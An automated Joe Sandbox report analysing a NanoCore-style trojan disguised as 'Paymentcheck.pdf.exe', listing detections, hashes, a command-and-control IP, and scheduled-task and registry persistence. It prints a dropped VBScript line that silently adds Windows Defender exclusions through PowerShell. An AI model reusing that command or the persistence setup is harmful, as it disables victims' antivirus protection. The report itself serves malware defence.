behaviorgraph top1 signatures2 2 Behavior Graph ID: 458302 Sample: Paymentcheck.pdf.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 59 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Multi AV Scanner detection for dropped file 2->63 65 13 other signatures 2->65 8 Paymentcheck.pdf.exe 3 9 2->8         started        12 RegAsm.exe 2 2->12         started        14 dhcpmon.exe 2->14         started        16 dhcpmon.exe 2->16         started        process3 file4 49 C:\Users\user\AppData\...\msbuildd.exe, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 8->51 dropped 53 C:\Users\...\msbuildd.exe:Zone.Identifier, ASCII 8->53 dropped 55 2 other malicious files 8->55 dropped 71 Creates an undocumented autostart registry key 8->71 73 Writes to foreign memory regions 8->73 75 Injects a PE file into a foreign processes 8->75 18 RegAsm.exe 1 14 8->18         started        23 wscript.exe 1 8->23         started        25 conhost.exe 12->25         started        27 conhost.exe 14->27         started        29 conhost.exe 16->29         started        signatures5 process6 dnsIp7 57 217.138.212.57, 2018, 49771 M247GB United Kingdom 18->57 43 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 18->43 dropped 45 C:\Users\user\AppData\Local\...\tmp715E.tmp, XML 18->45 dropped 47 C:\Program Files (x86)\...\dhcpmon.exe, PE32 18->47 dropped 67 Uses schtasks.exe or at.exe to add and modify task schedules 18->67 31 schtasks.exe 1 18->31         started        33 schtasks.exe 1 18->33         started        69 Wscript starts Powershell (via cmd or directly) 23->69 35 powershell.exe 9 23->35         started        file8 signatures9 process10 process11 37 conhost.exe 31->37         started        39 conhost.exe 33->39         started        41 conhost.exe 35->41         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Paymentcheck.pdf.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe100%Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%VirustotalBrowse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\RegAsm.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\RegAsm.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\RegAsm.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe33%ReversingLabsByteCode-MSIL.Downloader.Seraph

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
13.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
13.2.RegAsm.exe.5210000.21.unpack100%AviraTR/NanoCore.fadteDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.fontbureau.comV0%Avira URL Cloudsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.fontbureau.coma0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://www.fontbureau.comgrita0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.fontbureau.comttva0%Avira URL Cloudsafe
http://www.sakkal.com0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.apache.org/licenses/LICENSE-2.0Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpfalse
    		high
    http://www.fontbureau.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
      		high
      http://www.fontbureau.com/designersGPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
        		high
        http://www.fontbureau.com/designers/?Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
          		high
          http://www.founder.com.cn/cn/bThePaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpfalse
            		high
            http://www.fontbureau.com/designers?Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
              		high
              http://www.tiro.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.fontbureau.comVPaymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designersPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                		high
                http://www.goodfont.co.krPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://google.comRegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comaPaymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpfalse
                    		high
                    http://www.carterandcone.comlPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/cabarga.htmlNPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/cThePaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.galapagosdesign.com/staff/dennis.htmPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://fontfabrik.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.comgritaPaymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cnPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/frere-user.htmlPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                        		high
                        http://www.jiyu-kobo.co.jp/Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/DPleasePaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers8Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                          		high
                          https://oneget.orgformat.ps1xmlagement.dll2040.missionsandpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fonts.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                            		high
                            http://www.sandoll.co.krPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.urwpp.deDPleasePaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.zhongyicts.com.cnPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comttvaPaymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePaymentcheck.pdf.exe, 00000000.00000002.821957126.0000000002A21000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.931755679.00000000048B4000.00000004.00000001.sdmpfalse
                              		high
                              http://www.sakkal.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://oneget.orgpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              217.138.212.57
                              		unknownUnited Kingdom
                              		9009M247GBtrue

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:458302
                              Start date:03.08.2021
                              Start time:08:25:33
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 13m 55s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:Paymentcheck.pdf.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:28
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@20/21@0/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 6.9% (good quality ratio 5.6%)
                              • Quality average: 59.4%
                              • Quality standard deviation: 30.7%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 70
                              • Number of non-executed functions: 2
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:27:49Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegAsm.exe" s>$(Arg0)
                              08:27:50AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              08:27:51Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
                              08:28:28API Interceptor11x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):64616
                              Entropy (8bit):6.037264560032456
                              Encrypted:false
                              SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                              MD5:6FD7592411112729BF6B1F2F6C34899F
                              SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                              SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                              SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                              Malicious:false
                              Antivirus:
                              • Antivirus: Virustotal, Detection: 0%, Browse
                              • Antivirus: Metadefender, Detection: 0%, Browse
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Paymentcheck.pdf.exe.log
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):1119
                              Entropy (8bit):5.356708753875314
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                              MD5:3197B1D4714B56F2A6AC9E83761739AE
                              SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                              SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                              SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                              Malicious:true
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):42
                              Entropy (8bit):4.0050635535766075
                              Encrypted:false
                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                              Malicious:false
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):42
                              Entropy (8bit):4.0050635535766075
                              Encrypted:false
                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                              Malicious:false
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                              C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):64616
                              Entropy (8bit):6.037264560032456
                              Encrypted:false
                              SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                              MD5:6FD7592411112729BF6B1F2F6C34899F
                              SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                              SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                              SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                              Malicious:true
                              Antivirus:
                              • Antivirus: Virustotal, Detection: 0%, Browse
                              • Antivirus: Metadefender, Detection: 0%, Browse
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                              C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):183
                              Entropy (8bit):4.996304200597312
                              Encrypted:false
                              SSDEEP:3:FER/n0eFHgSSJJF2uV1HeGAFddGeWLCXknRAut+kiEaKC5SufyM1K/RFofD6TRWx:FER/lFHsCu/eGgdEYmRAuwknaZ5SuH1D
                              MD5:7A70E43727FA98EE052774DD83D19A21
                              SHA1:17B818FD7465E1EBBAFBFDAD7645B9B1B4916F71
                              SHA-256:B89E52891531303B67688453F3C3CF35A703347A79E42BC19B4CD028815A6620
                              SHA-512:B36610E59CD7EBEFE413E3895B88BD184DC8A386F35A568F73D0A4C3E98F5BA04ED9F8CD124886C709469EA57F22192A57EFF627B1928D6B36733EE2F33C6986
                              Malicious:true
                              Reputation:unknown
                              Preview: CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'", 0, False
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kehsj010.euk.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wciuifo5.2ha.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\tmp715E.tmp
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1307
                              Entropy (8bit):5.101975891238948
                              Encrypted:false
                              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Yfa5xtn:cbk4oL600QydbQxIYODOLedq3ja5j
                              MD5:36C3A95160862C73B9B16754B2473BAF
                              SHA1:5957A8FD60A7100853CEC24FA250F95BD0CE6379
                              SHA-256:2B59AC4D549FB914694F5BE05D2668666C546ACAAD5855703D0C0DCDBC57068D
                              SHA-512:CFF3F0A3A2BFBE57F95CAC2DE28CC9C10A0DAE141040EEE01819F96C4218179841B7E50C44F225CF20144A94D5F734138BC0BF049D889F4314B394629B10D6BC
                              Malicious:true
                              Reputation:unknown
                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                              C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1310
                              Entropy (8bit):5.109425792877704
                              Encrypted:false
                              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                              Malicious:false
                              Reputation:unknown
                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):232
                              Entropy (8bit):7.024371743172393
                              Encrypted:false
                              SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                              MD5:32D0AAE13696FF7F8AF33B2D22451028
                              SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                              SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                              SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                              Malicious:false
                              Reputation:unknown
                              Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:Non-ISO extended-ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):8
                              Entropy (8bit):3.0
                              Encrypted:false
                              SSDEEP:3:Fn4:2
                              MD5:8B3B9D6BBA20F384B042BE6D1B0558BE
                              SHA1:411EBC808586DA365028E37A1619FEFFB20B7247
                              SHA-256:543DFB4810139C95BEAA208EFFCCAEE38F6694A71391AFD0E584F87D17FEE8F8
